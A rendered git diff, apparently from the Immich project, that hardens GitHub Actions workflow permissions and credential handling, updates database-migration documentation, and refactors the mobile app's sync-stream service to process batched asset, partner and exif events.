name: ShellCheck
|
name: ShellCheck
|
||||||
runs-on: ubuntu-latest
|
runs-on: ubuntu-latest
|
||||||
|
permissions:
|
||||||
|
contents: read
|
||||||
steps:
|
steps:
|
||||||
- uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
- uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
||||||
|
with:
|
||||||
|
persist-credentials: false
|
||||||
|
|
||||||
- name: Run ShellCheck
|
- name: Run ShellCheck
|
||||||
uses: ludeeus/action-shellcheck@master
|
uses: ludeeus/action-shellcheck@master
|
||||||
with:
|
with:
|
||||||
ignore_paths: >-
|
ignore_paths: >-
|
||||||
**/open-api/**
|
**/open-api/**
|
||||||
**/openapi/**
|
**/openapi**
|
||||||
**/node_modules/**
|
**/node_modules/**
|
||||||
|
|
||||||
generated-api-up-to-date:
|
generated-api-up-to-date:
|
||||||
name: OpenAPI Clients
|
name: OpenAPI Clients
|
||||||
runs-on: ubuntu-latest
|
runs-on: ubuntu-latest
|
||||||
|
permissions:
|
||||||
|
contents: read
|
||||||
steps:
|
steps:
|
||||||
- name: Checkout code
|
- name: Checkout code
|
||||||
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
||||||
|
with:
|
||||||
|
persist-credentials: false
|
||||||
|
|
||||||
- name: Setup Node
|
- name: Setup Node
|
||||||
uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4
|
uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4
|
||||||
@ -476,14 +536,18 @@ jobs:
|
|||||||
|
|
||||||
- name: Verify files have not changed
|
- name: Verify files have not changed
|
||||||
if: steps.verify-changed-files.outputs.files_changed == 'true'
|
if: steps.verify-changed-files.outputs.files_changed == 'true'
|
||||||
|
env:
|
||||||
|
CHANGED_FILES: ${{ steps.verify-changed-files.outputs.changed_files }}
|
||||||
run: |
|
run: |
|
||||||
echo "ERROR: Generated files not up to date!"
|
echo "ERROR: Generated files not up to date!"
|
||||||
echo "Changed files: ${{ steps.verify-changed-files.outputs.changed_files }}"
|
echo "Changed files: ${CHANGED_FILES}"
|
||||||
exit 1
|
exit 1
|
||||||
|
|
||||||
generated-typeorm-migrations-up-to-date:
|
generated-typeorm-migrations-up-to-date:
|
||||||
name: TypeORM Checks
|
name: TypeORM Checks
|
||||||
runs-on: ubuntu-latest
|
runs-on: ubuntu-latest
|
||||||
|
permissions:
|
||||||
|
contents: read
|
||||||
services:
|
services:
|
||||||
postgres:
|
postgres:
|
||||||
image: tensorchord/pgvecto-rs:pg14-v0.2.0@sha256:739cdd626151ff1f796dc95a6591b55a714f341c737e27f045019ceabf8e8c52
|
image: tensorchord/pgvecto-rs:pg14-v0.2.0@sha256:739cdd626151ff1f796dc95a6591b55a714f341c737e27f045019ceabf8e8c52
|
||||||
@ -505,6 +569,8 @@ jobs:
|
|||||||
steps:
|
steps:
|
||||||
- name: Checkout code
|
- name: Checkout code
|
||||||
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
||||||
|
with:
|
||||||
|
persist-credentials: false
|
||||||
|
|
||||||
- name: Setup Node
|
- name: Setup Node
|
||||||
uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4
|
uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4
|
||||||
@ -521,7 +587,7 @@ jobs:
|
|||||||
run: npm run migrations:run
|
run: npm run migrations:run
|
||||||
|
|
||||||
- name: Test npm run schema:reset command works
|
- name: Test npm run schema:reset command works
|
||||||
run: npm run typeorm:schema:reset
|
run: npm run schema:reset
|
||||||
|
|
||||||
- name: Generate new migrations
|
- name: Generate new migrations
|
||||||
continue-on-error: true
|
continue-on-error: true
|
||||||
@ -535,9 +601,11 @@ jobs:
|
|||||||
server/src
|
server/src
|
||||||
- name: Verify migration files have not changed
|
- name: Verify migration files have not changed
|
||||||
if: steps.verify-changed-files.outputs.files_changed == 'true'
|
if: steps.verify-changed-files.outputs.files_changed == 'true'
|
||||||
|
env:
|
||||||
|
CHANGED_FILES: ${{ steps.verify-changed-files.outputs.changed_files }}
|
||||||
run: |
|
run: |
|
||||||
echo "ERROR: Generated migration files not up to date!"
|
echo "ERROR: Generated migration files not up to date!"
|
||||||
echo "Changed files: ${{ steps.verify-changed-files.outputs.changed_files }}"
|
echo "Changed files: ${CHANGED_FILES}"
|
||||||
cat ./src/*-TestMigration.ts
|
cat ./src/*-TestMigration.ts
|
||||||
exit 1
|
exit 1
|
||||||
|
|
||||||
@ -555,9 +623,11 @@ jobs:
|
|||||||
|
|
||||||
- name: Verify SQL files have not changed
|
- name: Verify SQL files have not changed
|
||||||
if: steps.verify-changed-sql-files.outputs.files_changed == 'true'
|
if: steps.verify-changed-sql-files.outputs.files_changed == 'true'
|
||||||
|
env:
|
||||||
|
CHANGED_FILES: ${{ steps.verify-changed-sql-files.outputs.changed_files }}
|
||||||
run: |
|
run: |
|
||||||
echo "ERROR: Generated SQL files not up to date!"
|
echo "ERROR: Generated SQL files not up to date!"
|
||||||
echo "Changed files: ${{ steps.verify-changed-sql-files.outputs.changed_files }}"
|
echo "Changed files: ${CHANGED_FILES}"
|
||||||
exit 1
|
exit 1
|
||||||
|
|
||||||
# mobile-integration-tests:
|
# mobile-integration-tests:
|
||||||
|
13
.github/workflows/weblate-lock.yml
vendored
13
.github/workflows/weblate-lock.yml
vendored
@ -4,30 +4,32 @@ on:
|
|||||||
pull_request:
|
pull_request:
|
||||||
branches: [main]
|
branches: [main]
|
||||||
|
|
||||||
|
permissions: {}
|
||||||
|
|
||||||
jobs:
|
jobs:
|
||||||
pre-job:
|
pre-job:
|
||||||
runs-on: ubuntu-latest
|
runs-on: ubuntu-latest
|
||||||
|
permissions:
|
||||||
|
contents: read
|
||||||
outputs:
|
outputs:
|
||||||
should_run: ${{ steps.found_paths.outputs.i18n == 'true' && github.head_ref != 'chore/translations'}}
|
should_run: ${{ steps.found_paths.outputs.i18n == 'true' && github.head_ref != 'chore/translations'}}
|
||||||
steps:
|
steps:
|
||||||
- name: Checkout code
|
- name: Checkout code
|
||||||
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
||||||
|
with:
|
||||||
|
persist-credentials: false
|
||||||
- id: found_paths
|
- id: found_paths
|
||||||
uses: dorny/paths-filter@de90cc6fb38fc0963ad72b210f1f284cd68cea36 # v3
|
uses: dorny/paths-filter@de90cc6fb38fc0963ad72b210f1f284cd68cea36 # v3
|
||||||
with:
|
with:
|
||||||
filters: |
|
filters: |
|
||||||
i18n:
|
i18n:
|
||||||
- 'i18n/!(en)**\.json'
|
- 'i18n/!(en)**\.json'
|
||||||
- name: Debug
|
|
||||||
run: |
|
|
||||||
echo "Should run: ${{ steps.found_paths.outputs.i18n == 'true' && github.head_ref != 'chore/translations'}}"
|
|
||||||
echo "Found i18n paths: ${{ steps.found_paths.outputs.i18n }}"
|
|
||||||
echo "Head ref: ${{ github.head_ref }}"
|
|
||||||
|
|
||||||
enforce-lock:
|
enforce-lock:
|
||||||
name: Check Weblate Lock
|
name: Check Weblate Lock
|
||||||
needs: [pre-job]
|
needs: [pre-job]
|
||||||
runs-on: ubuntu-latest
|
runs-on: ubuntu-latest
|
||||||
|
permissions: {}
|
||||||
if: ${{ needs.pre-job.outputs.should_run == 'true' }}
|
if: ${{ needs.pre-job.outputs.should_run == 'true' }}
|
||||||
steps:
|
steps:
|
||||||
- name: Check weblate lock
|
- name: Check weblate lock
|
||||||
@ -47,6 +49,7 @@ jobs:
|
|||||||
name: Weblate Lock Check Success
|
name: Weblate Lock Check Success
|
||||||
needs: [enforce-lock]
|
needs: [enforce-lock]
|
||||||
runs-on: ubuntu-latest
|
runs-on: ubuntu-latest
|
||||||
|
permissions: {}
|
||||||
if: always()
|
if: always()
|
||||||
steps:
|
steps:
|
||||||
- name: Any jobs failed?
|
- name: Any jobs failed?
|
||||||
|
@ -1,14 +1,14 @@
|
|||||||
# Database Migrations
|
# Database Migrations
|
||||||
|
|
||||||
After making any changes in the `server/src/entities`, a database migration need to run in order to register the changes in the database. Follow the steps below to create a new migration.
|
After making any changes in the `server/src/schema`, a database migration need to run in order to register the changes in the database. Follow the steps below to create a new migration.
|
||||||
|
|
||||||
1. Run the command
|
1. Run the command
|
||||||
|
|
||||||
```bash
|
```bash
|
||||||
npm run typeorm:migrations:generate <migration-name>
|
npm run migrations:generate <migration-name>
|
||||||
```
|
```
|
||||||
|
|
||||||
2. Check if the migration file makes sense.
|
2. Check if the migration file makes sense.
|
||||||
3. Move the migration file to folder `./server/src/migrations` in your code editor.
|
3. Move the migration file to folder `./server/src/schema/migrations` in your code editor.
|
||||||
|
|
||||||
The server will automatically detect `*.ts` file changes and restart. Part of the server start-up process includes running any new migrations, so it will be applied immediately.
|
The server will automatically detect `*.ts` file changes and restart. Part of the server start-up process includes running any new migrations, so it will be applied immediately.
|
||||||
|
5
docs/src/pages/errors.md
Normal file
5
docs/src/pages/errors.md
Normal file
@ -0,0 +1,5 @@
|
|||||||
|
# Errors
|
||||||
|
|
||||||
|
## TypeORM Upgrade
|
||||||
|
|
||||||
|
The upgrade to Immich `v2.x.x` has a required upgrade path to `v1.132.0+`. This means it is required to start up the application at least once on version `1.132.0` (or later). Doing so will complete database schema upgrades that are required for `v2.0.0`. After Immich has successfully booted on this version, shut the system down and try the `v2.x.x` upgrade again.
|
@ -996,6 +996,7 @@
|
|||||||
"filetype": "Filetype",
|
"filetype": "Filetype",
|
||||||
"filter": "Filter",
|
"filter": "Filter",
|
||||||
"filter_people": "Filter people",
|
"filter_people": "Filter people",
|
||||||
|
"filter_places": "Filter places",
|
||||||
"find_them_fast": "Find them fast by name with search",
|
"find_them_fast": "Find them fast by name with search",
|
||||||
"fix_incorrect_match": "Fix incorrect match",
|
"fix_incorrect_match": "Fix incorrect match",
|
||||||
"folder": "Folder",
|
"folder": "Folder",
|
||||||
|
@ -1,8 +1,12 @@
|
|||||||
|
import 'package:http/http.dart' as http;
|
||||||
import 'package:immich_mobile/domain/models/sync_event.model.dart';
|
import 'package:immich_mobile/domain/models/sync_event.model.dart';
|
||||||
import 'package:openapi/api.dart';
|
|
||||||
|
|
||||||
abstract interface class ISyncApiRepository {
|
abstract interface class ISyncApiRepository {
|
||||||
Future<void> ack(List<String> data);
|
Future<void> ack(List<String> data);
|
||||||
|
|
||||||
Stream<List<SyncEvent>> getSyncEvents(List<SyncRequestType> type);
|
Future<void> streamChanges(
|
||||||
|
Function(List<SyncEvent>, Function() abort) onData, {
|
||||||
|
int batchSize,
|
||||||
|
http.Client? httpClient,
|
||||||
|
});
|
||||||
}
|
}
|
||||||
|
@ -2,9 +2,17 @@ import 'package:immich_mobile/domain/interfaces/db.interface.dart';
|
|||||||
import 'package:openapi/api.dart';
|
import 'package:openapi/api.dart';
|
||||||
|
|
||||||
abstract interface class ISyncStreamRepository implements IDatabaseRepository {
|
abstract interface class ISyncStreamRepository implements IDatabaseRepository {
|
||||||
Future<bool> updateUsersV1(Iterable<SyncUserV1> data);
|
Future<void> updateUsersV1(Iterable<SyncUserV1> data);
|
||||||
Future<bool> deleteUsersV1(Iterable<SyncUserDeleteV1> data);
|
Future<void> deleteUsersV1(Iterable<SyncUserDeleteV1> data);
|
||||||
|
|
||||||
Future<bool> updatePartnerV1(Iterable<SyncPartnerV1> data);
|
Future<void> updatePartnerV1(Iterable<SyncPartnerV1> data);
|
||||||
Future<bool> deletePartnerV1(Iterable<SyncPartnerDeleteV1> data);
|
Future<void> deletePartnerV1(Iterable<SyncPartnerDeleteV1> data);
|
||||||
|
|
||||||
|
Future<void> updateAssetsV1(Iterable<SyncAssetV1> data);
|
||||||
|
Future<void> deleteAssetsV1(Iterable<SyncAssetDeleteV1> data);
|
||||||
|
Future<void> updateAssetsExifV1(Iterable<SyncAssetExifV1> data);
|
||||||
|
|
||||||
|
Future<void> updatePartnerAssetsV1(Iterable<SyncAssetV1> data);
|
||||||
|
Future<void> deletePartnerAssetsV1(Iterable<SyncAssetDeleteV1> data);
|
||||||
|
Future<void> updatePartnerAssetsExifV1(Iterable<SyncAssetExifV1> data);
|
||||||
}
|
}
|
||||||
|
@ -25,7 +25,7 @@ class DeviceSyncService {
|
|||||||
_localAlbumRepository = localAlbumRepository,
|
_localAlbumRepository = localAlbumRepository,
|
||||||
_localAssetRepository = localAssetRepository;
|
_localAssetRepository = localAssetRepository;
|
||||||
|
|
||||||
Future<void> syncAlbums() async {
|
Future<void> sync() async {
|
||||||
try {
|
try {
|
||||||
final Stopwatch stopwatch = Stopwatch()..start();
|
final Stopwatch stopwatch = Stopwatch()..start();
|
||||||
// The deviceAlbums will not have the updatedAt field
|
// The deviceAlbums will not have the updatedAt field
|
||||||
|
@ -2,25 +2,11 @@
|
|||||||
|
|
||||||
import 'dart:async';
|
import 'dart:async';
|
||||||
|
|
||||||
import 'package:collection/collection.dart';
|
|
||||||
import 'package:immich_mobile/domain/interfaces/sync_api.interface.dart';
|
import 'package:immich_mobile/domain/interfaces/sync_api.interface.dart';
|
||||||
import 'package:immich_mobile/domain/interfaces/sync_stream.interface.dart';
|
import 'package:immich_mobile/domain/interfaces/sync_stream.interface.dart';
|
||||||
|
import 'package:immich_mobile/domain/models/sync_event.model.dart';
|
||||||
import 'package:logging/logging.dart';
|
import 'package:logging/logging.dart';
|
||||||
import 'package:openapi/api.dart';
|
import 'package:openapi/api.dart';
|
||||||
import 'package:worker_manager/worker_manager.dart';
|
|
||||||
|
|
||||||
const _kSyncTypeOrder = [
|
|
||||||
SyncEntityType.userDeleteV1,
|
|
||||||
SyncEntityType.userV1,
|
|
||||||
SyncEntityType.partnerDeleteV1,
|
|
||||||
SyncEntityType.partnerV1,
|
|
||||||
SyncEntityType.assetDeleteV1,
|
|
||||||
SyncEntityType.assetV1,
|
|
||||||
SyncEntityType.assetExifV1,
|
|
||||||
SyncEntityType.partnerAssetDeleteV1,
|
|
||||||
SyncEntityType.partnerAssetV1,
|
|
||||||
SyncEntityType.partnerAssetExifV1,
|
|
||||||
];
|
|
||||||
|
|
||||||
class SyncStreamService {
|
class SyncStreamService {
|
||||||
final Logger _logger = Logger('SyncStreamService');
|
final Logger _logger = Logger('SyncStreamService');
|
||||||
@ -37,164 +23,70 @@ class SyncStreamService {
|
|||||||
_syncStreamRepository = syncStreamRepository,
|
_syncStreamRepository = syncStreamRepository,
|
||||||
_cancelChecker = cancelChecker;
|
_cancelChecker = cancelChecker;
|
||||||
|
|
||||||
Future<bool> _handleSyncData(
|
bool get isCancelled => _cancelChecker?.call() ?? false;
|
||||||
|
|
||||||
|
Future<void> sync() => _syncApiRepository.streamChanges(_handleEvents);
|
||||||
|
|
||||||
|
Future<void> _handleEvents(List<SyncEvent> events, Function() abort) async {
|
||||||
|
List<SyncEvent> items = [];
|
||||||
|
for (final event in events) {
|
||||||
|
if (isCancelled) {
|
||||||
|
_logger.warning("Sync stream cancelled");
|
||||||
|
abort();
|
||||||
|
return;
|
||||||
|
}
|
||||||
|
|
||||||
|
if (event.type != items.firstOrNull?.type) {
|
||||||
|
await _processBatch(items);
|
||||||
|
}
|
||||||
|
|
||||||
|
items.add(event);
|
||||||
|
}
|
||||||
|
|
||||||
|
await _processBatch(items);
|
||||||
|
}
|
||||||
|
|
||||||
|
Future<void> _processBatch(List<SyncEvent> batch) async {
|
||||||
|
if (batch.isEmpty) {
|
||||||
|
return;
|
||||||
|
}
|
||||||
|
|
||||||
|
final type = batch.first.type;
|
||||||
|
await _handleSyncData(type, batch.map((e) => e.data));
|
||||||
|
await _syncApiRepository.ack([batch.last.ack]);
|
||||||
|
batch.clear();
|
||||||
|
}
|
||||||
|
|
||||||
|
Future<void> _handleSyncData(
|
||||||
SyncEntityType type,
|
SyncEntityType type,
|
||||||
// ignore: avoid-dynamic
|
// ignore: avoid-dynamic
|
||||||
Iterable<dynamic> data,
|
Iterable<dynamic> data,
|
||||||
) async {
|
) async {
|
||||||
if (data.isEmpty) {
|
|
||||||
_logger.warning("Received empty sync data for $type");
|
|
||||||
return false;
|
|
||||||
}
|
|
||||||
|
|
||||||
_logger.fine("Processing sync data for $type of length ${data.length}");
|
_logger.fine("Processing sync data for $type of length ${data.length}");
|
||||||
|
// ignore: prefer-switch-expression
|
||||||
try {
|
switch (type) {
|
||||||
if (type == SyncEntityType.partnerV1) {
|
case SyncEntityType.userV1:
|
||||||
return await _syncStreamRepository.updatePartnerV1(data.cast());
|
return _syncStreamRepository.updateUsersV1(data.cast());
|
||||||
}
|
case SyncEntityType.userDeleteV1:
|
||||||
|
return _syncStreamRepository.deleteUsersV1(data.cast());
|
||||||
if (type == SyncEntityType.partnerDeleteV1) {
|
case SyncEntityType.partnerV1:
|
||||||
return await _syncStreamRepository.deletePartnerV1(data.cast());
|
return _syncStreamRepository.updatePartnerV1(data.cast());
|
||||||
}
|
case SyncEntityType.partnerDeleteV1:
|
||||||
|
return _syncStreamRepository.deletePartnerV1(data.cast());
|
||||||
if (type == SyncEntityType.userV1) {
|
case SyncEntityType.assetV1:
|
||||||
return await _syncStreamRepository.updateUsersV1(data.cast());
|
return _syncStreamRepository.updateAssetsV1(data.cast());
|
||||||
}
|
case SyncEntityType.assetDeleteV1:
|
||||||
|
return _syncStreamRepository.deleteAssetsV1(data.cast());
|
||||||
if (type == SyncEntityType.userDeleteV1) {
|
case SyncEntityType.assetExifV1:
|
||||||
return await _syncStreamRepository.deleteUsersV1(data.cast());
|
return _syncStreamRepository.updateAssetsExifV1(data.cast());
|
||||||
}
|
case SyncEntityType.partnerAssetV1:
|
||||||
} catch (error, stack) {
|
return _syncStreamRepository.updatePartnerAssetsV1(data.cast());
|
||||||
_logger.severe("Error processing sync data for $type", error, stack);
|
case SyncEntityType.partnerAssetDeleteV1:
|
||||||
return false;
|
return _syncStreamRepository.deletePartnerAssetsV1(data.cast());
|
||||||
}
|
case SyncEntityType.partnerAssetExifV1:
|
||||||
|
return _syncStreamRepository.updatePartnerAssetsExifV1(data.cast());
|
||||||
|
default:
|
||||||
_logger.warning("Unknown sync data type: $type");
|
_logger.warning("Unknown sync data type: $type");
|
||||||
return false;
|
|
||||||
}
|
|
||||||
|
|
||||||
Future<void> _syncEvent(List<SyncRequestType> types) {
|
|
||||||
_logger.info("Syncing Events: $types");
|
|
||||||
final streamCompleter = Completer();
|
|
||||||
bool shouldComplete = false;
|
|
||||||
// the onDone callback might fire before the events are processed
|
|
||||||
// the following flag ensures that the onDone callback is not called
|
|
||||||
// before the events are processed and also that events are processed sequentially
|
|
||||||
Completer? mutex;
|
|
||||||
StreamSubscription? subscription;
|
|
||||||
try {
|
|
||||||
subscription = _syncApiRepository.getSyncEvents(types).listen(
|
|
||||||
(events) async {
|
|
||||||
if (events.isEmpty) {
|
|
||||||
_logger.warning("Received empty sync events");
|
|
||||||
return;
|
|
||||||
}
|
|
||||||
|
|
||||||
// If previous events are still being processed, wait for them to finish
|
|
||||||
if (mutex != null) {
|
|
||||||
await mutex!.future;
|
|
||||||
}
|
|
||||||
|
|
||||||
if (_cancelChecker?.call() ?? false) {
|
|
||||||
_logger.info("Sync cancelled, stopping stream");
|
|
||||||
subscription?.cancel();
|
|
||||||
if (!streamCompleter.isCompleted) {
|
|
||||||
streamCompleter.completeError(
|
|
||||||
CanceledError(),
|
|
||||||
StackTrace.current,
|
|
||||||
);
|
|
||||||
}
|
|
||||||
return;
|
|
||||||
}
|
|
||||||
|
|
||||||
// Take control of the mutex and process the events
|
|
||||||
mutex = Completer();
|
|
||||||
|
|
||||||
try {
|
|
||||||
final eventsMap = events.groupListsBy((event) => event.type);
|
|
||||||
final Map<SyncEntityType, String> acks = {};
|
|
||||||
|
|
||||||
for (final type in _kSyncTypeOrder) {
|
|
||||||
final data = eventsMap[type];
|
|
||||||
if (data == null) {
|
|
||||||
continue;
|
|
||||||
}
|
|
||||||
|
|
||||||
if (_cancelChecker?.call() ?? false) {
|
|
||||||
_logger.info("Sync cancelled, stopping stream");
|
|
||||||
mutex?.complete();
|
|
||||||
mutex = null;
|
|
||||||
if (!streamCompleter.isCompleted) {
|
|
||||||
streamCompleter.completeError(
|
|
||||||
CanceledError(),
|
|
||||||
StackTrace.current,
|
|
||||||
);
|
|
||||||
}
|
|
||||||
|
|
||||||
return;
|
|
||||||
}
|
|
||||||
|
|
||||||
if (data.isEmpty) {
|
|
||||||
_logger.warning("Received empty sync events for $type");
|
|
||||||
continue;
|
|
||||||
}
|
|
||||||
|
|
||||||
if (await _handleSyncData(type, data.map((e) => e.data))) {
|
|
||||||
// ignore: avoid-unsafe-collection-methods
|
|
||||||
acks[type] = data.last.ack;
|
|
||||||
} else {
|
|
||||||
_logger.warning("Failed to handle sync events for $type");
|
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
if (acks.isNotEmpty) {
|
|
||||||
await _syncApiRepository.ack(acks.values.toList());
|
|
||||||
}
|
|
||||||
_logger.info("$types events processed");
|
|
||||||
} catch (error, stack) {
|
|
||||||
_logger.warning("Error handling sync events", error, stack);
|
|
||||||
} finally {
|
|
||||||
mutex?.complete();
|
|
||||||
mutex = null;
|
|
||||||
}
|
|
||||||
|
|
||||||
if (shouldComplete) {
|
|
||||||
_logger.info("Sync done, completing stream");
|
|
||||||
if (!streamCompleter.isCompleted) streamCompleter.complete();
|
|
||||||
}
|
|
||||||
},
|
|
||||||
onError: (error, stack) {
|
|
||||||
_logger.warning("Error in sync stream for $types", error, stack);
|
|
||||||
// Do not proceed if the stream errors
|
|
||||||
if (!streamCompleter.isCompleted) {
|
|
||||||
// ignore: avoid-missing-completer-stack-trace
|
|
||||||
streamCompleter.completeError(error, stack);
|
|
||||||
}
|
|
||||||
},
|
|
||||||
onDone: () {
|
|
||||||
_logger.info("$types stream done");
|
|
||||||
if (mutex == null && !streamCompleter.isCompleted) {
|
|
||||||
streamCompleter.complete();
|
|
||||||
} else {
|
|
||||||
// Marks the stream as done but does not complete the completer
|
|
||||||
// until the events are processed
|
|
||||||
shouldComplete = true;
|
|
||||||
}
|
|
||||||
},
|
|
||||||
);
|
|
||||||
} catch (error, stack) {
|
|
||||||
_logger.severe("Error starting sync stream", error, stack);
|
|
||||||
if (!streamCompleter.isCompleted) {
|
|
||||||
streamCompleter.completeError(error, stack);
|
|
||||||
}
|
|
||||||
}
|
|
||||||
return streamCompleter.future.whenComplete(() {
|
|
||||||
_logger.info("Sync stream completed");
|
|
||||||
return subscription?.cancel();
|
|
||||||
});
|
|
||||||
}
|
|
||||||
|
|
||||||
Future<void> syncUsers() =>
|
|
||||||
_syncEvent([SyncRequestType.usersV1, SyncRequestType.partnersV1]);
|
|
||||||
}
|
}
|
||||||
|
@ -7,45 +7,49 @@ import 'package:immich_mobile/utils/isolate.dart';
|
|||||||
import 'package:worker_manager/worker_manager.dart';
|
import 'package:worker_manager/worker_manager.dart';
|
||||||
|
|
||||||
class BackgroundSyncManager {
|
class BackgroundSyncManager {
|
||||||
Cancelable<void>? _userSyncTask;
|
Cancelable<void>? _syncTask;
|
||||||
Cancelable<void>? _deviceAlbumSyncTask;
|
Cancelable<void>? _deviceAlbumSyncTask;
|
||||||
|
|
||||||
BackgroundSyncManager();
|
BackgroundSyncManager();
|
||||||
|
|
||||||
Future<void> cancel() {
|
Future<void> cancel() {
|
||||||
final futures = <Future>[];
|
final futures = <Future>[];
|
||||||
if (_userSyncTask != null) {
|
|
||||||
futures.add(_userSyncTask!.future);
|
if (_syncTask != null) {
|
||||||
|
futures.add(_syncTask!.future);
|
||||||
}
|
}
|
||||||
_userSyncTask?.cancel();
|
_syncTask?.cancel();
|
||||||
_userSyncTask = null;
|
_syncTask = null;
|
||||||
|
|
||||||
return Future.wait(futures);
|
return Future.wait(futures);
|
||||||
}
|
}
|
||||||
|
|
||||||
// No need to cancel the task, as it can also be run when the user logs out
|
// No need to cancel the task, as it can also be run when the user logs out
|
||||||
Future<void> syncDeviceAlbums() {
|
Future<void> syncLocal() {
|
||||||
if (_deviceAlbumSyncTask != null) {
|
if (_deviceAlbumSyncTask != null) {
|
||||||
return _deviceAlbumSyncTask!.future;
|
return _deviceAlbumSyncTask!.future;
|
||||||
}
|
}
|
||||||
|
|
||||||
_deviceAlbumSyncTask = runInIsolateGentle(
|
_deviceAlbumSyncTask = runInIsolateGentle(
|
||||||
computation: (ref) => ref.read(deviceSyncServiceProvider).syncAlbums(),
|
computation: (ref) => ref.read(deviceSyncServiceProvider).sync(),
|
||||||
);
|
);
|
||||||
|
|
||||||
return _deviceAlbumSyncTask!.whenComplete(() {
|
return _deviceAlbumSyncTask!.whenComplete(() {
|
||||||
_deviceAlbumSyncTask = null;
|
_deviceAlbumSyncTask = null;
|
||||||
});
|
});
|
||||||
}
|
}
|
||||||
|
|
||||||
Future<void> syncUsers() {
|
Future<void> syncRemote() {
|
||||||
if (_userSyncTask != null) {
|
if (_syncTask != null) {
|
||||||
return _userSyncTask!.future;
|
return _syncTask!.future;
|
||||||
}
|
}
|
||||||
|
|
||||||
_userSyncTask = runInIsolateGentle(
|
_syncTask = runInIsolateGentle(
|
||||||
computation: (ref) => ref.read(syncStreamServiceProvider).syncUsers(),
|
computation: (ref) => ref.read(syncStreamServiceProvider).sync(),
|
||||||
);
|
);
|
||||||
return _userSyncTask!.whenComplete(() {
|
|
||||||
_userSyncTask = null;
|
return _syncTask!.whenComplete(() {
|
||||||
|
_syncTask = null;
|
||||||
});
|
});
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
@ -12,22 +12,22 @@ import 'package:openapi/api.dart';
|
|||||||
class SyncApiRepository implements ISyncApiRepository {
|
class SyncApiRepository implements ISyncApiRepository {
|
||||||
final Logger _logger = Logger('SyncApiRepository');
|
final Logger _logger = Logger('SyncApiRepository');
|
||||||
final ApiService _api;
|
final ApiService _api;
|
||||||
final int _batchSize;
|
SyncApiRepository(this._api);
|
||||||
SyncApiRepository(this._api, {int batchSize = kSyncEventBatchSize})
|
|
||||||
: _batchSize = batchSize;
|
|
||||||
|
|
||||||
@override
|
|
||||||
Stream<List<SyncEvent>> getSyncEvents(List<SyncRequestType> type) {
|
|
||||||
return _getSyncStream(SyncStreamDto(types: type));
|
|
||||||
}
|
|
||||||
|
|
||||||
@override
|
@override
|
||||||
Future<void> ack(List<String> data) {
|
Future<void> ack(List<String> data) {
|
||||||
return _api.syncApi.sendSyncAck(SyncAckSetDto(acks: data));
|
return _api.syncApi.sendSyncAck(SyncAckSetDto(acks: data));
|
||||||
}
|
}
|
||||||
|
|
||||||
Stream<List<SyncEvent>> _getSyncStream(SyncStreamDto dto) async* {
|
@override
|
||||||
final client = http.Client();
|
Future<void> streamChanges(
|
||||||
|
Function(List<SyncEvent>, Function() abort) onData, {
|
||||||
|
int batchSize = kSyncEventBatchSize,
|
||||||
|
http.Client? httpClient,
|
||||||
|
}) async {
|
||||||
|
// ignore: avoid-unused-assignment
|
||||||
|
final stopwatch = Stopwatch()..start();
|
||||||
|
final client = httpClient ?? http.Client();
|
||||||
final endpoint = "${_api.apiClient.basePath}/sync/stream";
|
final endpoint = "${_api.apiClient.basePath}/sync/stream";
|
||||||
|
|
||||||
final headers = {
|
final headers = {
|
||||||
@ -35,20 +35,38 @@ class SyncApiRepository implements ISyncApiRepository {
|
|||||||
'Accept': 'application/jsonlines+json',
|
'Accept': 'application/jsonlines+json',
|
||||||
};
|
};
|
||||||
|
|
||||||
final queryParams = <QueryParam>[];
|
|
||||||
final headerParams = <String, String>{};
|
final headerParams = <String, String>{};
|
||||||
await _api.applyToParams(queryParams, headerParams);
|
await _api.applyToParams([], headerParams);
|
||||||
headers.addAll(headerParams);
|
headers.addAll(headerParams);
|
||||||
|
|
||||||
final request = http.Request('POST', Uri.parse(endpoint));
|
final request = http.Request('POST', Uri.parse(endpoint));
|
||||||
request.headers.addAll(headers);
|
request.headers.addAll(headers);
|
||||||
request.body = jsonEncode(dto.toJson());
|
request.body = jsonEncode(
|
||||||
|
SyncStreamDto(
|
||||||
|
types: [
|
||||||
|
SyncRequestType.usersV1,
|
||||||
|
SyncRequestType.partnersV1,
|
||||||
|
SyncRequestType.assetsV1,
|
||||||
|
SyncRequestType.partnerAssetsV1,
|
||||||
|
SyncRequestType.assetExifsV1,
|
||||||
|
SyncRequestType.partnerAssetExifsV1,
|
||||||
|
],
|
||||||
|
).toJson(),
|
||||||
|
);
|
||||||
|
|
||||||
String previousChunk = '';
|
String previousChunk = '';
|
||||||
List<String> lines = [];
|
List<String> lines = [];
|
||||||
|
|
||||||
|
bool shouldAbort = false;
|
||||||
|
|
||||||
|
void abort() {
|
||||||
|
_logger.warning("Abort requested, stopping sync stream");
|
||||||
|
shouldAbort = true;
|
||||||
|
}
|
||||||
|
|
||||||
try {
|
try {
|
||||||
final response = await client.send(request);
|
final response =
|
||||||
|
await client.send(request).timeout(const Duration(seconds: 20));
|
||||||
|
|
||||||
if (response.statusCode != 200) {
|
if (response.statusCode != 200) {
|
||||||
final errorBody = await response.stream.bytesToString();
|
final errorBody = await response.stream.bytesToString();
|
||||||
@ -59,27 +77,38 @@ class SyncApiRepository implements ISyncApiRepository {
|
|||||||
}
|
}
|
||||||
|
|
||||||
await for (final chunk in response.stream.transform(utf8.decoder)) {
|
await for (final chunk in response.stream.transform(utf8.decoder)) {
|
||||||
|
if (shouldAbort) {
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
|
||||||
previousChunk += chunk;
|
previousChunk += chunk;
